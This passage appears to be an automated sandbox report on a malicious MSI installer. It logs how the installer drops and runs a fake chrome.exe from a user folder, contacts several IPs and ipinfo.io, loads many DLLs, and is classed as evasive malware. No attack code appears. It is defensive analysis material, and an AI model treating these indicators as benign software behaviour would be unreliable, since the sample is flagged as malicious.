Source: chrome.exe, 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000003.00000000.1740214188.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000004.00000000.1758151655.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000004.00000002.1775306511.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000005.00000000.1774187268.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000005.00000002.1788091642.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000006.00000000.1784911644.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000006.00000002.1799707276.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000007.00000002.1811641793.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp, chrome.exe, 00000007.00000000.1798792150.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new
Source: chrome.exe, 00000008.00000002.4127616181.0000000007CCB000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: chrome.exe, 00000008.00000002.4127616181.0000000007CCB000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.4127616181.0000000007C3C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/missingauth
Source: chrome.exe, 00000008.00000002.4127616181.0000000007CF2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://unpkg.com/monaco-editor
Source: chrome.exe, 00000008.00000002.4127616181.0000000007C24000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.4127616181.0000000007CCB000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/?gws_rd=ssl
Source: chrome.exe, 00000008.00000002.4127616181.0000000007CF2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-3FMJXZBGEP
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 198.20.110.106:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.58.212.164:443 -> 192.168.2.4:49740 version: TLS 1.2

System Summary

barindex
Source: chrome_elf.dll.2.drStatic PE information: section name: .O%.
Source: chrome_elf.dll.2.drStatic PE information: section name: .l`q
Source: chrome_elf.dll.2.drStatic PE information: section name: .p}\
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeProcess Stats: CPU usage > 49%
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4fdcd3.msiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE00F.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE0EA.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE243.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE3AC.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE42A.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{1F409DE5-F41D-4B97-A3CD-EF30B43C9B23}Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE515.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIE00F.tmpJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DBA7703_2_00DBA770
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D36AD03_2_00D36AD0
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DF6D803_2_00DF6D80
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D980603_2_00D98060
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D380303_2_00D38030
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00E281903_2_00E28190
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D681003_2_00D68100
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00E2D11C3_2_00E2D11C
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00E312B03_2_00E312B0
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00E072503_2_00E07250
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DB82103_2_00DB8210
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D4D2003_2_00D4D200
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DFC3903_2_00DFC390
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D7F4C03_2_00D7F4C0
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D664F03_2_00D664F0
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DB34F03_2_00DB34F0
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DF24F03_2_00DF24F0
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D8C4803_2_00D8C480
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00E0B4703_2_00E0B470
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DF74703_2_00DF7470
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D534003_2_00D53400
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00E094103_2_00E09410
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D325F03_2_00D325F0
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DF85F03_2_00DF85F0
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D4F5803_2_00D4F580
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00E1A5803_2_00E1A580
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D545203_2_00D54520
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DF96F03_2_00DF96F0
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00E506AA3_2_00E506AA
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D3C6503_2_00D3C650
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DBE6003_2_00DBE600
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D3D6203_2_00D3D620
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DC56203_2_00DC5620
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00E0A7C03_2_00E0A7C0
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DB27F03_2_00DB27F0
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DBC7A03_2_00DBC7A0
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DB57203_2_00DB5720
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DCA8A03_2_00DCA8A0
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00E008603_2_00E00860
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DF19D03_2_00DF19D0
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D509903_2_00D50990
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00E099B03_2_00E099B0
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D5B9B03_2_00D5B9B0
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DB89B03_2_00DB89B0
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DB69503_2_00DB6950
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D65AC03_2_00D65AC0
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DF5AC03_2_00DF5AC0
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D55A903_2_00D55A90
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D4BA703_2_00D4BA70
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00E25A503_2_00E25A50
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DF7A303_2_00DF7A30
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D4AB503_2_00D4AB50
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D3EB603_2_00D3EB60
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D32B303_2_00D32B30
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DB5CA03_2_00DB5CA0
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D65C503_2_00D65C50
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D42C703_2_00D42C70
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D48C003_2_00D48C00
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D42DC03_2_00D42DC0
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00E4EDA53_2_00E4EDA5
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00E2DDAD3_2_00E2DDAD
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DB2DA03_2_00DB2DA0
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DF2D403_2_00DF2D40
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D3EED03_2_00D3EED0
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DF5ED03_2_00DF5ED0
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00D98EC03_2_00D98EC0
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00E05EB03_2_00E05EB0
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DF8EA03_2_00DF8EA0
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DF1E403_2_00DF1E40
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DC4E103_2_00DC4E10
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00E09E003_2_00E09E00
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DDBFC03_2_00DDBFC0
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DF0F503_2_00DF0F50
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00DB8F203_2_00DB8F20
Source: Joe Sandbox ViewDropped File: C:\Users\user\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.14 6B3265B2F82E206BED8B6CD56C2A3F0FA9D8FD027E19A9713DA618B177D9264B
Source: Joe Sandbox ViewDropped File: C:\Users\user\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.50 34397DE1D9DC94AAA08CA1D267B64B0E12CCABA008BABE6F592E563F00DC874B
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: String function: 00DB9F70 appears 42 times
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: String function: 00E0E040 appears 58 times
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: String function: 00E54060 appears 234 times
Source: MpClient.dll.1.drStatic PE information: Resource name: RT_VERSION type: Intel ia64 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: MpClient.dll.1.drStatic PE information: Number of sections : 11 > 10
Source: chrome_elf.dll.2.drStatic PE information: Number of sections : 16 > 10
Source: classification engineClassification label: mal72.evad.winMSI@16/167@5/5
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeCode function: 3_2_00E715D0 FormatMessageW,GetLastError,LocalFree,3_2_00E715D0
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CMLE55E.tmpJump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF3EE4656B409D7E1E.TMPJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: chrome.exeString found in binary or memory: Try '%ls --help' for more information.
Source: chrome.exeString found in binary or memory: Try '%ls --help' for more information.
Source: chrome.exeString found in binary or memory: Try '%ls --help' for more information.
Source: chrome.exeString found in binary or memory: Try '%ls --help' for more information.
Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\nf963-5d-qns6-w812.msi"
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E1CF8BADC61849C4C5214BC163FD5145
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeProcess created: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeProcess created: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeProcess created: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeProcess created: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeProcess created: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E1CF8BADC61849C4C5214BC163FD5145Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeProcess created: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeProcess created: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeProcess created: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeProcess created: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeJump to behavior
Source: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeProcess created: C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exe C:\Users\user\Chrome\Application\118.0.5993.120\chrome.exeJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
